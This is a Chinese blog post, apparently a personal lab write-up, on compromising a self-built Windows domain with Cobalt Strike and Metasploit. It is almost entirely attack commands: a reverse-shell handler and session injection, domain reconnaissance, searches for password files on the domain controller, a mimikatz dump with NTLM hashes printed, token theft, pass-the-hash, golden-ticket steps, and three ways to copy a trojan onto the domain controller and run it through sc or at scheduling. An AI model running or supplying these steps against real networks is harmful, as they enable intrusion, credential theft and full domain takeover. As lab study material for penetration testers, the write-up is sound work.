categories:
- 知識(shí)積累
top: FALSE
copyright: true
abbrlink: 1643719980
date: '2021-8-7 12:00:00'
description:1400x780
tags:
- 內(nèi)網(wǎng)滲透
- 提權(quán)
- 滲透測(cè)試
- 黑客工具
photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png
前言
- Cobalt Strike的基礎(chǔ)使用分冈,自建的域控霸株,就一臺(tái)用
搭建好了域控機(jī)
目標(biāo):
1、一臺(tái)2008R2的DC 192.168.136.133
2蘑秽、一臺(tái)2003 server的域內(nèi)機(jī)器 192.168.136.136
3箫攀、一臺(tái)2008R2的B2 192.168.136.138
內(nèi)網(wǎng)滲透拿域控
kali 192.168.1.104
一、cs上線
①直接用web傳遞發(fā)現(xiàn)失效了缀雳,原因是2003居然沒有powershell梢睛,那就傳馬识椰,由于cs馬傳上去無法運(yùn)行深碱,所以就用msf馬監(jiān)聽拿到shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run
②接著就將會(huì)話轉(zhuǎn)給cs
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 80
run
二、cs派生會(huì)話
首先把它派生會(huì)話smb功咒,可以繞防火墻
三绞蹦、cs的命令使用以及信息收集
1、查看當(dāng)前用戶組
shell whoami/groups
2景殷、查看域
shell net view /domain
3澡屡、枚舉域內(nèi)主機(jī)
shell net view /domain:GYLQ
4、查看DC的ip
shell ping WIN-NQ8TV3JGSN1
接著我發(fā)現(xiàn)2003機(jī)子太low了绩蜻,再添加一個(gè)2008的機(jī)子域內(nèi)機(jī)子繼續(xù)下面的測(cè)試梁厉,直接web傳遞踏兜,可以直接上線,server2008
5肉盹、查看域內(nèi)成員
shell net group "domain Computers" /domain
6疹尾、查看DC域控主機(jī)
shell net group "domain Controllers" /domain
shell nltest/dclist:GYLQ #也可以
7、查看域的信任關(guān)系
shell nltest /domain_trusts
8窍蓝、導(dǎo)入了powershell的模塊powerview.ps1的使用
powershell Invoke-ShareFinder #查看共享的
9繁成、cs的列舉域控命令
net dclist
net dclist /domain
10、列出共享cs命令
net share \\B1
11面睛、判斷是否能訪問域控機(jī)的C盤,所以是域超級(jí)管理員
shell dir \\WIN-NQ8TV3JGSN1\C$
12土涝、查看域內(nèi)的管理員
shell net group "enterprise admins" /domain
13幌墓、域內(nèi)的超級(jí)管理員
shell net group "domain admins" /domain
14、查看域內(nèi)組中的超級(jí)管理員
shell net localgroup "administrators" /domain
15茵肃、cs中的查看管理員組的信息
net group \\WIN-NQ8TV3JGSN1
16袭祟、查看遠(yuǎn)程的DC的管理員用戶
net localgroup \\WIN-NQ8TV3JGSN1 administrators
17、powerview模塊的命令查看用戶
powershell Get-NetLocalGroup -HostName WIN-NQ8TV3JGSN1
18您没、單靠命令搜索用戶胆绊,或者信息收集
1、查看登陸過的用戶
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\users
2仆抵、查看敏感文件
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\"*pass*" "*user*" "*config*" "username.*" "password.*"
3种冬、winrm執(zhí)行powershell
列舉C盤目錄
powershell Invoke-Command -ComputerName WIN-NQ8TV3JGSN1 -ScriptBlock{ dir c:\}
19、通過mimikatz抓取主域的NTLM
msv :
[00000003] Primary
* Username : B1$
* Domain : GYLQ
* NTLM : ccf1ceaea1d47a0948e5022bd4d7ae64
* SHA1 : 0ea509056cd0d8ab09f6deeec8ba2db643bae89e
四莺匠、內(nèi)網(wǎng)登陸認(rèn)證
1十兢、制作token訪問域控
steal_token 2688 域控的超級(jí)管理員pID
rev2self 恢復(fù)原來的令牌
就可以訪問域控的盤符
2、制作令牌
3遥缕、hash認(rèn)證
pth GYLQ\Administrator 285deb0940e1630b59d2cd9590fcbc91
五宵呛、黃金票據(jù)
需要:用戶、域名封孙、域id krbtgt的hash
1、查看當(dāng)前黃金票據(jù)
shell klist
2虎忌、獲取域SID
shell whoami/user
用戶名 SID
================ ===========================================
b1\administrator S-1-5-21-204603982-2387576990-164658498-500
3膜蠢、清除當(dāng)前票據(jù)
kerberos_ticket_purge
六、內(nèi)網(wǎng)橫向滲透獲取權(quán)限
方法一
1挑围、生成一個(gè)服務(wù)木馬為test.exe
然后上傳到windows/users/administrator里面
2杉辙、將其復(fù)制到域控機(jī)內(nèi)的temp中的命令,然后命名為a1.exe
shell copy C:\Users\administrator\test.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a1.exe
3蜘矢、然后創(chuàng)建一個(gè)服務(wù)為a1
shell sc \\WIN-NQ8TV3JGSN1 create a1 binpath= c:\windows\temp\a1.exe
4品腹、接著執(zhí)行剛剛創(chuàng)建的服務(wù)a1
shell sc \\WIN-NQ8TV3JGSN1 start a1
5、接著域控的機(jī)子上線CS的system權(quán)限
方法二
這次會(huì)比較簡(jiǎn)單一些舞吭,就是定時(shí)執(zhí)行文件
還是創(chuàng)建一個(gè)木馬
1羡鸥、然后保存為a2.exe,按照上面同樣的命令復(fù)制到域控機(jī)內(nèi)
shell copy C:\Users\administrator\a2.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a2.exe
查看是否上傳成功
shell dir \\WIN-NQ8TV3JGSN1\C\windows\temp
2、查看域控當(dāng)前時(shí)間
shell net time \\WIN-NQ8TV3JGSN1
3澎剥、接著利用at來創(chuàng)建一個(gè)一分鐘執(zhí)行木馬的計(jì)劃
shell at \\WIN-NQ8TV3JGSN1 12:58:39 C:\windows\temp\a2.exe
cs上線了
方法三
上面做了個(gè)總結(jié)赶舆,下面是域控機(jī)無法聯(lián)網(wǎng)的情況怎么辦
1祭饭、這是用中轉(zhuǎn)器來進(jìn)行獲取域控
2、接著生成一個(gè)a3.exe木馬九串,返回beacon到剛剛創(chuàng)建的監(jiān)聽器
3、將a3.exe木馬上傳到users\administrator目錄中
4品山、然后下面命令將木馬復(fù)制到域控機(jī)內(nèi)
shell copy C:\Users\administrator\a3.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a3.exe
查看是否復(fù)制成功
shell dir \\WIN-NQ8TV3JGSN1\C$\windows\temp
5烤低、查看當(dāng)前時(shí)間和定時(shí)執(zhí)行木馬
shell net time \\WIN-NQ8TV3JGSN1
shell at \\WIN-NQ8TV3JGSN1 13:27:43 C:\windows\temp\a3.exe
6、等到了我們定好的時(shí)間涯呻,不出網(wǎng)域控會(huì)smb形式上線
結(jié)果圖
我的個(gè)人博客
孤桜懶契:http://gylq.gitee.io
